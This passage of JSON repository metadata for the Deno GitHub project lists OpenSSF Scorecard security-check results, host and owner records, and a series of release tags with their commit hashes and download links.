license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/